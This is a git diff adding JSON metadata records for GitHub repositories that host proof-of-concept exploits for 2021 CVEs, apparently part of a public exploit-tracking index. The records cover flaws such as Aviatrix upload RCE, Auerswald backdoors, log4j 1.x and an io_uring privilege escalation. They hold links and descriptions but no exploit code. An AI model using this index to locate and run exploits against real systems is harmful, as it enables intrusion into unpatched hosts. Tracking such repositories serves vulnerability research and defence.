b/2021/CVE-2021-40822.json @@ -0,0 +1,33 @@ +[ + { + "id": 493274768, + "name": "CVE-2021-40822", + "full_name": "phor3nsic\/CVE-2021-40822", + "owner": { + "login": "phor3nsic", + "id": 18534814, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18534814?v=4", + "html_url": "https:\/\/github.com\/phor3nsic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/phor3nsic\/CVE-2021-40822", + "description": null, + "fork": false, + "created_at": "2022-05-17T13:58:11Z", + "updated_at": "2022-05-20T18:23:52Z", + "pushed_at": "2022-05-17T18:38:15Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40839.json b/2021/CVE-2021-40839.json new file mode 100644 index 0000000000..4647a2ebce --- /dev/null +++ b/2021/CVE-2021-40839.json @@ -0,0 +1,33 @@ +[ + { + "id": 437816743, + "name": "CVE-2021-40839", + "full_name": "itlabbet\/CVE-2021-40839", + "owner": { + "login": "itlabbet", + "id": 43929595, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43929595?v=4", + "html_url": "https:\/\/github.com\/itlabbet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/itlabbet\/CVE-2021-40839", + "description": "Dirty Cow kernel exploit without libcrypt dependency", + "fork": false, + "created_at": "2021-12-13T09:47:22Z", + "updated_at": "2022-01-19T21:46:01Z", + "pushed_at": "2021-12-13T09:48:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40845.json b/2021/CVE-2021-40845.json new file mode 100644 index 0000000000..67806ee139 --- /dev/null +++ b/2021/CVE-2021-40845.json @@ -0,0 +1,38 @@ +[ + { + "id": 405041265, + "name": "CVE-2021-40845", + "full_name": "ricardojoserf\/CVE-2021-40845", + "owner": { + "login": "ricardojoserf", + "id": 11477353, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11477353?v=4", + "html_url": "https:\/\/github.com\/ricardojoserf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ricardojoserf\/CVE-2021-40845", + "description": "AlphaWeb XE, the embedded web server running on AlphaCom XE, has a vulnerability which allows to upload PHP files leading to RCE once the authentication is successful - https:\/\/ricardojoserf.github.io\/CVE-2021-40845\/", + "fork": false, + "created_at": "2021-09-10T10:23:55Z", + "updated_at": "2024-08-12T20:16:20Z", + "pushed_at": "2021-09-11T20:20:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "alphaweb", + "cve", + "exploit", + "zenitel" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40859.json b/2021/CVE-2021-40859.json new file mode 100644 index 0000000000..0f6f11427d --- /dev/null +++ b/2021/CVE-2021-40859.json @@ -0,0 +1,95 @@ +[ + { + "id": 442366243, + "name": "CVE-2021-40859", + "full_name": "419066074\/CVE-2021-40859", + "owner": { + "login": "419066074", + "id": 18423034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18423034?v=4", + "html_url": "https:\/\/github.com\/419066074", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/419066074\/CVE-2021-40859", + "description": "Auerswald COMpact 8.0B Backdoors exploit", + "fork": false, + "created_at": "2021-12-28T06:05:42Z", + "updated_at": "2024-08-12T20:19:17Z", + "pushed_at": "2021-12-28T05:18:01Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 442505568, + "name": "CVE-2021-40859", + "full_name": "0xr001\/CVE-2021-40859", + "owner": { + "login": "0xr001", + "id": 69428284, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69428284?v=4", + "html_url": "https:\/\/github.com\/0xr001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xr001\/CVE-2021-40859", + "description": "Auerswald COMpact 8.0B Backdoors exploit", + "fork": false, + "created_at": "2021-12-28T15:30:10Z", + "updated_at": "2021-12-28T15:30:11Z", + "pushed_at": "2021-12-28T14:04:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 442810426, + "name": "CVE-2021-40859", + "full_name": "pussycat0x\/CVE-2021-40859", + "owner": { + "login": "pussycat0x", + "id": 65701233, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65701233?v=4", + "html_url": "https:\/\/github.com\/pussycat0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pussycat0x\/CVE-2021-40859", + "description": "Auerswald VoIP System Secret Backdoors -PoC", + "fork": false, + "created_at": "2021-12-29T15:15:38Z", + "updated_at": "2024-04-11T19:55:13Z", + "pushed_at": "2021-12-29T15:28:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40865.json b/2021/CVE-2021-40865.json new file mode 100644 index 0000000000..668991fd9b --- /dev/null +++ b/2021/CVE-2021-40865.json @@ -0,0 +1,33 @@ +[ + { + "id": 432133933, + "name": "CVE-2021-40865", + "full_name": "hktalent\/CVE-2021-40865", + "owner": { + "login": "hktalent", + "id": 18223385, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18223385?v=4", + "html_url": "https:\/\/github.com\/hktalent", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hktalent\/CVE-2021-40865", + "description": "CVE-2021-40865", + "fork": false, + "created_at": "2021-11-26T10:09:40Z", + "updated_at": "2023-08-12T14:44:59Z", + "pushed_at": "2021-11-26T10:10:33Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40870.json b/2021/CVE-2021-40870.json new file mode 100644 index 0000000000..18353675c2 --- /dev/null +++ b/2021/CVE-2021-40870.json @@ -0,0 +1,137 @@ +[ + { + "id": 414527702, + "name": "CVE-2021-40870", + "full_name": "System00-Security\/CVE-2021-40870", + "owner": { + "login": "System00-Security", + "id": 81620343, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81620343?v=4", + "html_url": "https:\/\/github.com\/System00-Security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/System00-Security\/CVE-2021-40870", + "description": "Unrestricted upload of file with dangerous type in Aviatrix allows an authenticated user to execute arbitrary code", + "fork": false, + "created_at": "2021-10-07T08:53:19Z", + "updated_at": "2021-10-07T14:36:34Z", + "pushed_at": "2021-10-07T08:53:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-40870", + "poc" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 414694325, + "name": "CVE-2021-40870", + "full_name": "0xAgun\/CVE-2021-40870", + "owner": { + "login": "0xAgun", + "id": 78228966, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78228966?v=4", + "html_url": "https:\/\/github.com\/0xAgun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xAgun\/CVE-2021-40870", + "description": "Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file which allows an unauthenticated user to execute arbitrary code via directory traversal", + "fork": false, + "created_at": "2021-10-07T17:19:12Z", + "updated_at": "2024-08-12T20:17:05Z", + "pushed_at": "2021-10-09T06:06:47Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-40870", + "remote-code-execution" + ], + "visibility": "public", + "forks": 6, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 414763941, + "name": "CVE-2021-40870", + "full_name": "orangmuda\/CVE-2021-40870", + "owner": { + "login": "orangmuda", + "id": 91846073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91846073?v=4", + "html_url": "https:\/\/github.com\/orangmuda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/orangmuda\/CVE-2021-40870", + "description": "Aviatrix allows an authenticated user to execute arbitrary code", + "fork": false, + "created_at": "2021-10-07T21:34:00Z", + "updated_at": "2024-08-12T20:17:05Z", + "pushed_at": "2021-10-07T21:36:11Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-40870", + "remote-code-execution" + ], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 414859029, + "name": "CVE-2021-40870", + "full_name": "JoyGhoshs\/CVE-2021-40870", + "owner": { + "login": "JoyGhoshs", + "id": 36255129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36255129?v=4", + "html_url": "https:\/\/github.com\/JoyGhoshs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JoyGhoshs\/CVE-2021-40870", + "description": "Unrestricted upload of file with dangerous type in Aviatrix allows an authenticated user to execute arbitrary code", + "fork": false, + "created_at": "2021-10-08T05:35:40Z", + "updated_at": "2023-12-11T05:31:49Z", + "pushed_at": "2022-04-15T06:06:50Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-40870" + ], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40875.json b/2021/CVE-2021-40875.json new file mode 100644 index 0000000000..76e14d991f --- /dev/null +++ b/2021/CVE-2021-40875.json @@ -0,0 +1,79 @@ +[ + { + "id": 405876934, + "name": "derailed", + "full_name": "SakuraSamuraii\/derailed", + "owner": { + "login": "SakuraSamuraii", + "id": 90020213, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90020213?v=4", + "html_url": "https:\/\/github.com\/SakuraSamuraii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SakuraSamuraii\/derailed", + "description": "CVE-2021-40875: Tools to Inspect Gurock Testrail Servers for Vulnerabilities related to CVE-2021-40875.", + "fork": false, + "created_at": "2021-09-13T07:35:18Z", + "updated_at": "2022-10-22T06:31:23Z", + "pushed_at": "2021-09-22T13:24:31Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2021-40875", + "exploit", + "gurock", + "hacking", + "poc", + "proof-of-concept", + "sakurasamuraii", + "testrail", + "tools" + ], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 463282170, + "name": "TestRail-files.md5-IAC-scanner", + "full_name": "Lul\/TestRail-files.md5-IAC-scanner", + "owner": { + "login": "Lul", + "id": 59487177, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59487177?v=4", + "html_url": "https:\/\/github.com\/Lul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lul\/TestRail-files.md5-IAC-scanner", + "description": "Python scanner for TestRail servers vulnerable to CVE-2021-40875", + "fork": false, + "created_at": "2022-02-24T19:52:01Z", + "updated_at": "2022-02-25T01:56:15Z", + "pushed_at": "2022-02-28T14:53:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-40875", + "python3", + "testrail" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40903.json b/2021/CVE-2021-40903.json new file mode 100644 index 0000000000..46b725c01c --- /dev/null +++ b/2021/CVE-2021-40903.json @@ -0,0 +1,33 @@ +[ + { + "id": 505059125, + "name": "CVE-2021-40903", + "full_name": "vulnz\/CVE-2021-40903", + "owner": { + "login": "vulnz", + "id": 20043135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20043135?v=4", + "html_url": "https:\/\/github.com\/vulnz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vulnz\/CVE-2021-40903", + "description": "CVE-2021-40903", + "fork": false, + "created_at": "2022-06-19T09:01:24Z", + "updated_at": "2024-02-13T19:02:23Z", + "pushed_at": "2022-06-19T09:04:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40904.json b/2021/CVE-2021-40904.json new file mode 100644 index 0000000000..539c644ee5 --- /dev/null +++ b/2021/CVE-2021-40904.json @@ -0,0 +1,33 @@ +[ + { + "id": 416272595, + "name": "CVE-2021-40904", + "full_name": "Edgarloyola\/CVE-2021-40904", + "owner": { + "login": "Edgarloyola", + "id": 43635073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43635073?v=4", + "html_url": "https:\/\/github.com\/Edgarloyola", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Edgarloyola\/CVE-2021-40904", + "description": null, + "fork": false, + "created_at": "2021-10-12T09:38:48Z", + "updated_at": "2022-01-01T12:27:43Z", + "pushed_at": "2022-09-16T17:51:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40905.json b/2021/CVE-2021-40905.json new file mode 100644 index 0000000000..8bbc2956f3 --- /dev/null +++ b/2021/CVE-2021-40905.json @@ -0,0 +1,33 @@ +[ + { + "id": 416271934, + "name": "CVE-2021-40905", + "full_name": "Edgarloyola\/CVE-2021-40905", + "owner": { + "login": "Edgarloyola", + "id": 43635073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43635073?v=4", + "html_url": "https:\/\/github.com\/Edgarloyola", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Edgarloyola\/CVE-2021-40905", + "description": null, + "fork": false, + "created_at": "2021-10-12T09:36:56Z", + "updated_at": "2022-01-01T12:23:21Z", + "pushed_at": "2022-09-16T17:59:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40906.json b/2021/CVE-2021-40906.json new file mode 100644 index 0000000000..7cdfe1e99b --- /dev/null +++ b/2021/CVE-2021-40906.json @@ -0,0 +1,33 @@ +[ + { + "id": 416269763, + "name": "CVE-2021-40906", + "full_name": "Edgarloyola\/CVE-2021-40906", + "owner": { + "login": "Edgarloyola", + "id": 43635073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43635073?v=4", + "html_url": "https:\/\/github.com\/Edgarloyola", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Edgarloyola\/CVE-2021-40906", + "description": null, + "fork": false, + "created_at": "2021-10-12T09:30:38Z", + "updated_at": "2022-01-02T09:08:29Z", + "pushed_at": "2022-04-22T17:19:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40978.json b/2021/CVE-2021-40978.json new file mode 100644 index 0000000000..f85779b717 --- /dev/null +++ b/2021/CVE-2021-40978.json @@ -0,0 +1,33 @@ +[ + { + "id": 413241448, + "name": "CVE-2021-40978", + "full_name": "nisdn\/CVE-2021-40978", + "owner": { + "login": "nisdn", + "id": 15092748, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15092748?v=4", + "html_url": "https:\/\/github.com\/nisdn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nisdn\/CVE-2021-40978", + "description": null, + "fork": false, + "created_at": "2021-10-04T01:36:17Z", + "updated_at": "2022-05-07T07:05:46Z", + "pushed_at": "2022-09-07T13:23:12Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-4104.json b/2021/CVE-2021-4104.json new file mode 100644 index 0000000000..184020b4b4 --- /dev/null +++ b/2021/CVE-2021-4104.json @@ -0,0 +1,64 @@ +[ + { + "id": 438246567, + "name": "log4shell_1.x", + "full_name": "cckuailong\/log4shell_1.x", + "owner": { + "login": "cckuailong", + "id": 10824150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10824150?v=4", + "html_url": "https:\/\/github.com\/cckuailong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cckuailong\/log4shell_1.x", + "description": "log4j 1.x RCE Poc -- CVE-2021-4104", + "fork": false, + "created_at": "2021-12-14T12:35:08Z", + "updated_at": "2024-05-16T10:24:30Z", + "pushed_at": "2021-12-14T12:56:24Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 20, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 446349513, + "name": "log4j", + "full_name": "open-AIMS\/log4j", + "owner": { + "login": "open-AIMS", + "id": 68976138, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68976138?v=4", + "html_url": "https:\/\/github.com\/open-AIMS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/open-AIMS\/log4j", + "description": "Log4j version 1.2.17 without the offending class responsible for CVE-2021-4104.", + "fork": false, + "created_at": "2022-01-10T09:01:46Z", + "updated_at": "2022-01-11T02:43:30Z", + "pushed_at": "2022-01-13T03:57:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41073.json b/2021/CVE-2021-41073.json new file mode 100644 index 0000000000..8e8ad2f034 --- /dev/null +++ b/2021/CVE-2021-41073.json @@ -0,0 +1,33 @@ +[ + { + "id": 465436142, + "name": "Linux_LPE_io_uring_CVE-2021-41073", + "full_name": "chompie1337\/Linux_LPE_io_uring_CVE-2021-41073", + "owner": { + "login": "chompie1337", + "id": 56364411, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56364411?v=4", + "html_url": "https:\/\/github.com\/chompie1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chompie1337\/Linux_LPE_io_uring_CVE-2021-41073", + "description": null, + "fork": false, + "created_at": "2022-03-02T19:07:37Z", + "updated_at": "2024-08-12T20:21:11Z", + "pushed_at": "2022-03-08T15:37:34Z", + "stargazers_count": 98, + "watchers_count": 98, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 98, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41074.json b/2021/CVE-2021-41074.json new file mode 100644 index 0000000000..d23f8335b4 --- /dev/null +++ b/2021/CVE-2021-41074.json @@ -0,0 +1,33 @@ +[ + { + "id": 406110856, + "name": "CVE-2021-41074", + "full_name": "dillonkirsch\/CVE-2021-41074", + "owner": { + "login": "dillonkirsch", + "id": 1911339, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1911339?v=4", + "html_url": "https:\/\/github.com\/dillonkirsch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dillonkirsch\/CVE-2021-41074", + "description": "CSRF in Qloapps HotelCommerce 1.5.1", + "fork": false, + "created_at": "2021-09-13T19:55:57Z", + "updated_at": "2024-05-13T23:08:53Z", + "pushed_at": "2021-09-19T08:50:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41078.json b/2021/CVE-2021-41078.json new file mode 100644 index 0000000000..1831c7c22d --- /dev/null +++ b/2021/CVE-2021-41078.json @@ -0,0 +1,39 @@ +[ + { + "id": 529784417, + "name": "CVE-2021-41078", + "full_name": "s-index\/CVE-2021-41078", + "owner": { + "login": "s-index", + "id": 56715563, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56715563?v=4", + "html_url": "https:\/\/github.com\/s-index", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s-index\/CVE-2021-41078", + "description": "nameko Arbitrary code execution due to YAML deserialization", + "fork": false, + "created_at": "2022-08-28T06:42:59Z", + "updated_at": "2022-08-28T07:20:36Z", + "pushed_at": "2022-08-28T07:27:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "code-execution", + "cve-2021-41078", + "nameko", + "python", + "unsafe-yaml-load" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41081.json b/2021/CVE-2021-41081.json new file mode 100644 index 0000000000..0bcb18cfcb --- /dev/null +++ b/2021/CVE-2021-41081.json @@ -0,0 +1,33 @@ +[ + { + "id": 435080918, + "name": "CVE-2021-41081", + "full_name": "sudaiv\/CVE-2021-41081", + "owner": { + "login": "sudaiv", + "id": 94256505, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94256505?v=4", + "html_url": "https:\/\/github.com\/sudaiv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudaiv\/CVE-2021-41081", + "description": "N-DAY VULNERABILITY RESEARCH (FROM PATCH TO EXPLOIT ANALYSIS OF CVE-2021-41081)", + "fork": false, + "created_at": "2021-12-05T05:22:08Z", + "updated_at": "2021-12-05T19:02:21Z", + "pushed_at": "2021-12-05T19:02:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41091.json b/2021/CVE-2021-41091.json new file mode 100644 index 0000000000..fb6eceb137 --- /dev/null +++ b/2021/CVE-2021-41091.json @@ -0,0 +1,95 @@ +[ + { + "id": 635201457, + "name": "CVE-2021-41091", + "full_name": "UncleJ4ck\/CVE-2021-41091", + "owner": { + "login": "UncleJ4ck", + "id": 52085661, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52085661?v=4", + "html_url": "https:\/\/github.com\/UncleJ4ck", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UncleJ4ck\/CVE-2021-41091", + "description": "POC for CVE-2021-41091", + "fork": false, + "created_at": "2023-05-02T07:25:13Z", + "updated_at": "2024-09-12T10:27:44Z", + "pushed_at": "2023-05-20T09:16:34Z", + "stargazers_count": 65, + "watchers_count": 65, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 65, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 798589964, + "name": "CVE-2021-41091", + "full_name": "jrbH4CK\/CVE-2021-41091", + "owner": { + "login": "jrbH4CK", + "id": 163496398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163496398?v=4", + "html_url": "https:\/\/github.com\/jrbH4CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jrbH4CK\/CVE-2021-41091", + "description": null, + "fork": false, + "created_at": "2024-05-10T04:42:35Z", + "updated_at": "2024-05-10T04:48:04Z", + "pushed_at": "2024-05-10T04:48:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822121304, + "name": "Vulnerable-Docker-Engine", + "full_name": "SNE-M23-SN\/Vulnerable-Docker-Engine", + "owner": { + "login": "SNE-M23-SN", + "id": 174135229, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174135229?v=4", + "html_url": "https:\/\/github.com\/SNE-M23-SN", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SNE-M23-SN\/Vulnerable-Docker-Engine", + "description": "This exploit offers an in-depth look at the CVE-2021-41091 security vulnerability and provides a step-by-step guide on how to utilize the exploit script to achieve privilege escalation on a host.", + "fork": false, + "created_at": "2024-06-30T10:57:02Z", + "updated_at": "2024-07-24T11:06:49Z", + "pushed_at": "2024-07-24T11:06:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41117.json b/2021/CVE-2021-41117.json new file mode 100644 index 0000000000..0cc5c28144 --- /dev/null +++ b/2021/CVE-2021-41117.json @@ -0,0 +1,33 @@ +[ + { + "id": 492411370, + "name": "keypairvuln", + "full_name": "badkeys\/keypairvuln", + "owner": { + "login": "badkeys", + "id": 97682451, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97682451?v=4", + "html_url": "https:\/\/github.com\/badkeys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/badkeys\/keypairvuln", + "description": "Private keys generated with vulnerable keypair versions (CVE-2021-41117)", + "fork": false, + "created_at": "2022-05-15T06:56:53Z", + "updated_at": "2024-10-13T05:42:08Z", + "pushed_at": "2023-10-12T14:27:08Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41160.json b/2021/CVE-2021-41160.json new file mode 100644 index 0000000000..9eddfa8f2e --- /dev/null +++ b/2021/CVE-2021-41160.json @@ -0,0 +1,33 @@ +[ + { + "id": 582846037, + "name": "CVE-2021-41160", + "full_name": "Jajangjaman\/CVE-2021-41160", + "owner": { + "login": "Jajangjaman", + "id": 121527146, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121527146?v=4", + "html_url": "https:\/\/github.com\/Jajangjaman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jajangjaman\/CVE-2021-41160", + "description": "FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. In affected versions a malicious server might trigger out of bound writes in a connected client. Connections using GDI or SurfaceCommands to send graphics updates to the client might send `0` width\/height or out of CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2022-12-28T02:59:42Z", + "updated_at": "2023-02-20T12:17:31Z", + "pushed_at": "2022-12-27T22:27:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 